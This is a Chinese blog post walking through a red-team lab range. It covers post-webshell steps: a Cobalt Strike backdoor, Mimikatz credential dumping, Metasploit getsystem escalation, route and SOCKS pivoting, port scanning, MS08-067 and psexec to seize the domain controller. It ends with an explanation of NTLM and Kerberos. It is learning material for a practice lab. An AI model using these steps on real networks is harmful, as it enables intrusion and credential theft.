<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="生活,旅行,思考,代码,博客" />
   
  <meta name="description" content="一生努力" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    红队靶场系列 |  0Rld
  </title>
  <meta name="generator" content="hexo-theme-yilia-plus">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/css/style.css">

  
<script src="/js/pace.min.js"></script>


  

  

<link rel="alternate" href="/atom.xml" title="0Rld" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

</html>
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
<body>
  <div id="app">
    <main class="content">
      <section class="outer">
  <article id="post-红队靶场系列" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  红队靶场系列
</h1>
  

    </header>
    

    
    <div class="article-meta">
      <a href="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/" class="article-date">
  <time datetime="2020-09-09T07:17:46.000Z" itemprop="datePublished">2020-09-09</time>
</a>
      
      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.8k字</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">7分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      


      

      
      <h2 id="ATT-amp-CK红队评估实战靶场一"><a href="#ATT-amp-CK红队评估实战靶场一" class="headerlink" title="ATT&amp;CK红队评估实战靶场一"></a><strong>ATT&amp;CK红队评估实战靶场一</strong></h2><p><strong>前言：</strong></p>
<p>为了更好理解内网渗透，还是要多做一些大型靶场，加深理解</p>
<p>靶场链接地址：<a href="http://vulnstack.qiyuanxuetang.net/vuln/detail/2/" target="_blank" rel="noopener">http://vulnstack.qiyuanxuetang.net/vuln/detail/2/</a></p>
<p>外网部分此篇章先不讲解，另一篇章会讲，这里主讲get webshell后，该如何操作。</p>
<p><strong>拓扑结构:</strong></p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/1.png" alt></p>
<p><strong>知识点小记：</strong></p>
<p>内网攻击姿势-MS08-067</p>
<p>内网流量转发</p>
<p>域渗透-psexec模块、mimikatz模块</p>
<h3 id="1-信息收集"><a href="#1-信息收集" class="headerlink" title="1.信息收集"></a><strong>1.信息收集</strong></h3><p>用蚁剑连接后，进入终端，先简单查看下本机信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">C:\phpStudy\WWW&gt; whoami     &#x3D;》god\administrator</span><br><span class="line">C:\phpStudy\WWW&gt; ipconfig   &#x3D;》192.168.52.143</span><br><span class="line">C:\phpStudy\WWW&gt; net view   &#x3D;》OWA、ROOT-TVI862UBEH</span><br></pre></td></tr></table></figure>

<p>得到当前的用户权限是administrator，存在内网，网段为192.168.52.x，局域网还存在两台主机，计算机名分别是:OWA、ROOT-TVI862UBEH</p>
<p>用cs生成后门文件，上传至目标主机，连接cs</p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/2.png" alt></p>
<p>在目标主机运行木马文件后，cs这边会显示上线</p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/3.png" alt></p>
<p>可运行Mimikatz，查看<strong>明文密码、所在域、域SID、krbtgt的NTLM Hash值等</strong></p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/4.png" alt></p>
<p><strong>net config Workstation (当前计算机名，全名，用户名，系统版本，工作站域，登陆域)</strong></p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/6.png" alt></p>
<p><strong>systeminfo 查看系统信息</strong>  </p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/9.png" alt></p>
<p><strong>用Ladon插件探测内网存活主机</strong></p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/8.png" alt></p>
<p>至此，大致得到以下信息</p>
<p><strong>当前域是:god.org</strong></p>
<p><strong>域控是192.168.52.138，主机名为OWA</strong></p>
<p><strong>域成员是192.168.52.141，主机名为ROOT-TVI862UBEH</strong></p>
<h3 id="2-内网渗透"><a href="#2-内网渗透" class="headerlink" title="2.内网渗透"></a><strong>2.内网渗透</strong></h3><p><strong>将CS和msf进行联动，也就是当获取了CobaltStrike类型的session后，派生一个MSF类型的shell。</strong></p>
<p>先在在CS上新建一个监听器，类型为foreign</p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/7.png" alt></p>
<p>然后在msf上，设置相应的监听器，在cs上，选择已经建立好的监听器，点击spawn，选中msf外置监听器</p>
<p>成功使用cs反弹shell到msf上</p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/12.png" alt></p>
<p>msf的后渗透模块meterpreter中，可使用命令getsystem进行提权，成功获得win7主机所有权限</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: GOD\Administrator</span><br><span class="line">meterpreter &gt; getsystem </span><br><span class="line">...got system via technique 1 (Named Pipe Impersonation (In Memory&#x2F;Admin)).</span><br><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: NT AUTHORITY\SYSTEM</span><br></pre></td></tr></table></figure>

<h3 id="3-横向移动"><a href="#3-横向移动" class="headerlink" title="3.横向移动"></a>3.横向移动</h3><p>先扫描内网主机端口，但由于攻击机的流量无法直达内网中，所以需要设置代理进行转发流量</p>
<p>添加路由，随后设置代理，然后直接利用msf模块的端口扫描，发现了135、445端口开放</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; run autoroute <span class="literal">-s</span> <span class="number">192.168</span>.<span class="number">52.0</span>/<span class="number">24</span></span><br><span class="line">[!] Meterpreter scripts are deprecated. <span class="keyword">Try</span> post/multi/manage/autoroute.</span><br><span class="line">[!] Example: run post/multi/manage/autoroute OPTION=value [<span class="type">...</span>]</span><br><span class="line">[*] Adding a route to <span class="number">192.168</span>.<span class="number">52.0</span>/<span class="number">255.255</span>.<span class="number">255.0</span>...</span><br><span class="line">[+] Added route to <span class="number">192.168</span>.<span class="number">52.0</span>/<span class="number">255.255</span>.<span class="number">255.0</span> via <span class="number">192.168</span>.<span class="number">126.129</span></span><br><span class="line">[*] Use the <span class="literal">-p</span> option to list all active routes</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msf5 exploit(multi/handler) &gt; use auxiliary/server/socks4a </span><br><span class="line">msf5 auxiliary(server/socks4a) &gt; run</span><br><span class="line">[*] Auxiliary module running as background job <span class="number">0</span>.</span><br><span class="line">[*] Starting the socks4a proxy server</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(server/socks4a) &gt; use auxiliary/scanner/portscan/tcp </span><br><span class="line">msf5 auxiliary(scanner/portscan/tcp) &gt; set rhosts <span class="number">192.168</span>.<span class="number">52.141</span></span><br><span class="line">rhosts =&gt; <span class="number">192.168</span>.<span class="number">52.141</span></span><br><span class="line">msf5 auxiliary(scanner/portscan/tcp) &gt; run</span><br><span class="line">[+] <span class="number">192.168</span>.<span class="number">52.141</span>:       - <span class="number">192.168</span>.<span class="number">52.141</span>:<span class="number">21</span> - TCP OPEN</span><br><span class="line">[+] <span class="number">192.168</span>.<span class="number">52.141</span>:       - <span class="number">192.168</span>.<span class="number">52.141</span>:<span class="number">135</span> - TCP OPEN</span><br><span class="line">[+] <span class="number">192.168</span>.<span class="number">52.141</span>:       - <span class="number">192.168</span>.<span class="number">52.141</span>:<span class="number">139</span> - TCP OPEN</span><br><span class="line">[+] <span class="number">192.168</span>.<span class="number">52.141</span>:       - <span class="number">192.168</span>.<span class="number">52.141</span>:<span class="number">445</span> - TCP OPEN</span><br></pre></td></tr></table></figure>

<p>这里用ms08_067漏洞，可直接拿下域成员</p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/13.png" alt></p>
<p>这里用psexec模块进行渗透，先设置监听器，选择SMB，然后在探测到的主机页面选择域控，点击psexec</p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/25.png" alt></p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/24.png" alt></p>
<p>然后选择win7主机的账号和密码，监听器选择刚刚设置的，提交，过一会就收到了域控的信息</p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/22.png" alt></p>
<p>可以看到域控已经上线，且获得了system权限，至此内网所有主机权限全部get！</p>
<p><img src="/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/21.png" alt></p>
<p><strong>后记：</strong></p>
<p>初学内网渗透，上面还有很多细节没有讲清楚，主要是复现一些师傅的思路，然后提取其中的知识要点，再去深入研究</p>
<h2 id="Windows认证协议"><a href="#Windows认证协议" class="headerlink" title="Windows认证协议"></a>Windows认证协议</h2><p>Windows有两种认证协议：<strong>NTLM（NT LAN Manager）和Kerberos</strong></p>
<p>域成员计算机在登录的时候可以<strong>选择登录到域中或此电脑</strong></p>
<p><strong>选择登陆到域一般会采用Kerberos协议在域控DC上进行认证</strong>。</p>
<h3 id="1-NTLM协议"><a href="#1-NTLM协议" class="headerlink" title="1.NTLM协议"></a><strong>1.NTLM协议</strong></h3><p>NTLM协议基于NTLM hash，<strong>windows本地登陆的密码由LM hash和NTLM hash组成</strong>,存储在SAM文件中</p>
<p>在登陆Windows的时候，系统会将<strong>用户输入的密码转换成NTLM hash</strong>并<strong>与SAM文件中的密码进行对比</strong>，如果相同，则认证成功。</p>
<h3 id="2-Kerberos认证协议"><a href="#2-Kerberos认证协议" class="headerlink" title="2.Kerberos认证协议"></a><strong>2.Kerberos认证协议</strong></h3><p>​    Kerberos是一种网络认证协议，整个认证过程涉及到三方：<strong>客户端、服务端和 KDC</strong>（Key Distribution Center），在 <strong>Windows 域环境中，KDC 的角色由 DC</strong>（Domain Controller）来担当。</p>
<p>​    Kerberos<strong>基于票据(Ticket)进行安全认证</strong>，<strong>票据是用来在认证服务器和用户请求的服务之间传递用户身份的凭证</strong>。以下是kerberos协议的认证流程：</p>
<p><strong>第1步：</strong>KRB_AS_REQ：Client-A发送Authenticator（通过A密码加密的一个时间戳TimeStamp）向KDC的AS服务认证自己的身份；</p>
<p>​    <strong>第2步：</strong>KRB_AS_REP：AS通过KDC数据库中存储的Client-A密码的副本，解密收到的Authenticator，如果解密出的TimeStamp符合要求，则AS服务认为Client-A就是所谓的Client-A；</p>
<p>​     认证成功后，AS服务生成一个短期有效的SessionKeya-kdc，将该Key使用A的密码副本加密成密文1，另外将Key连同时间戳标志（控制该SessionKey的有效时间）通过TGS服务的密码也就是KDC的密码加密为密文2（称为TGT），将这两个密文组合成KRB_AS_REP返回给Client-A；</p>
<p>​    <strong>第3步：</strong>KRB_TGS_REQ：Client-A在接收到KRB_AS_REP后，首先使用自身密码解密密文1得到SessionKeya-kdc，此时需要注意的是，密文2（TGT）是被KDC的密码加密的，所以Client-A无法解密，这也是Kerberos协议设计的精妙之处，既解决了Server端（TGS相对于Client-A也称之为Server端）无法及时接收SessionKey的问题，又不怕Client-A对该TGT的伪造，因为Client-A不知道Server端的密码。</p>
<p>​     得到SessionKeya-kdc后，Client-A利用其加密时间戳生成Authenticator用于向TGS申请Client-A与Client-B进行认证所需的SessionKeya-b，连同刚才KRB_AS_REP接收的TGT一同组合成KRB_TGS_REQ发送给TGS</p>
<p>​    <strong>第4步：</strong>KRB_TGS_REP：TGS在接收到KRB_TGS_REP之后，利用KDC密码解密TGT获得本来就该发送给自己的SessionKeya-kdc，然后用其解密KRB_TGS_REQ中的Authenticator得到Client-A发送过来的时间戳，如果时间戳符合要求，则生成一个短期有效的SessionKeya-b，注意此时利用SessionKeya-kdc将SessionKeya-b加密为密文1，然后利用Server-B的密码将SessionKeya-b加密为密文2（称为ServiceTicket），两个密文一同构成KRB_TGS_REP返回给Client-A；</p>
<p>​    <strong>第5步：</strong>KRB_AP_REQ：Client-A在接收到KRB_TGS_REP之后，首先使用缓存的SessionKeya-kdc将密文1中的SessionKeya-b解密出来，然后利用其加密时间戳生成Authenticator用于向B进行对自身的验证，另外，和刚才TGT一样，密文2也就是ServiceTicket是用Server-B的密码加密的，所以Client-A无法解密，也就无法伪造，这也同样解决了在三方认证中作为Server端的B无法及时接收SessionKey的问题，又不怕Client-A对ServiceTicket的伪造；</p>
<p>​    <strong>第6步：</strong>KRB_AP_REP：Server-B受到KRB_AP_REQ之后，利用自身密码解密ServiceTicket，得到SessionKeya-b，然后用SessionKeya-b解密Authenticator得到时间戳，验证A的身份</p>
<p>参考： <a href="https://www.freebuf.com/articles/system/229200.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/229200.html</a></p>

      
      <!-- reward -->
      
      <div id="reward-btn">
        打赏
      </div>
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong s>
              本博客所有文章除特别声明外，均采用 <a href="https://www.apache.org/licenses/LICENSE-2.0.html" rel="external nofollow"
                target="_blank">Apache License 2.0</a> 许可协议。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        Share
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://cumtchen.gitee.io/2020/09/09/%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      

    </footer>

  </div>

  
  
  <nav class="article-nav">
    
      <a href="/2020/09/11/Metasploit/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            Metasploit
          
        </div>
      </a>
    
    
      <a href="/2020/08/25/strike/" class="article-nav-link">
        <strong class="article-nav-caption">Older posts</strong>
        <div class="article-nav-title">cobalt strike</div>
      </a>
    
  </nav>


  

  
  
<!-- valine评论 -->
<div id="vcomments-box">
    <div id="vcomments">
    </div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: '6tKR3VfNf8sE102pp4QlkOSM-gzGzoHsz',
        app_key: 'OVsjODdU2QixblMDCtzmEfYS',
        path: window.location.pathname,
        notify: '',
        verify: 'false',
        avatar: 'mp',
        placeholder: '给我的文章加点建议吧~',
        recordIP: true
    });
    const infoEle = document.querySelector('#vcomments .info');
    if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
        infoEle.childNodes.forEach(function (item) {
            item.parentNode.removeChild(item);
        });
    }
</script>
<style>
    #vcomments-box {
        padding: 5px 30px;
    }

    @media screen and (max-width: 800px) {
        #vcomments-box {
            padding: 5px 0px;
        }
    }

    #vcomments-box #vcomments {
        background-color: #fff;
    }

    .v .vlist .vcard .vh {
        padding-right: 20px;
    }

    .v .vlist .vcard {
        padding-left: 10px;
    }
</style>

  

  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul class="list-inline">
      <li>
        &copy;
        2020
        0Rld
      </li>
      <li>
        
          Powered by
        
        
        <a href="https://hexo.io" target="_blank">Hexo</a> Theme <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul class="list-inline">
      <li>
        
        
        <span>
  <i>PV:<span id="busuanzi_value_page_pv"></span></i>
  <i>UV:<span id="busuanzi_value_site_uv"></span></i>
</span>
        
      </li>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src=''></script>
        
      </li>
    </ul>
  </div>
</footer>
    <div class="to_top">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>
      </div>
    </main>
      <aside class="sidebar">
        <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/1.jpg" alt="0Rld"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/2020/about">About</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
      </aside>
      <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>Buy me a cup of coffee~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
      
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<script src="/js/share.js"></script>



<script src="/fancybox/jquery.fancybox.min.js"></script>




<script>
  try {
    var typed = new Typed("#subtitle", {
    strings: ['四季更替，梦境更迭','生活,旅行,思考,代码,博客','努力一定会有所获！'],
    startDelay: 0,
    typeSpeed: 200,
    loop: true,
    backSpeed: 100,
    showCursor: true
    });
  } catch (err) {
  }
  
</script>




<script src="/js/tocbot.min.js"></script>

<script>
  // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer:'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto',
    onClick: (e) => {
      $('.toc-link').removeClass('is-active-link');
      $(`a[href=${e.target.hash}]`).addClass('is-active-link');
      $(e.target.hash).scrollIntoView();
      return false;
    }
  });
</script>


<script>
  var ayerConfig = {
    mathjax: true
  }
</script>


<script src="/js/ayer.js"></script>


<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>



<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.6/unpacked/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>


<script type="text/javascript" src="https://js.users.51.la/20544303.js"></script>
  </div>
</body>

</html>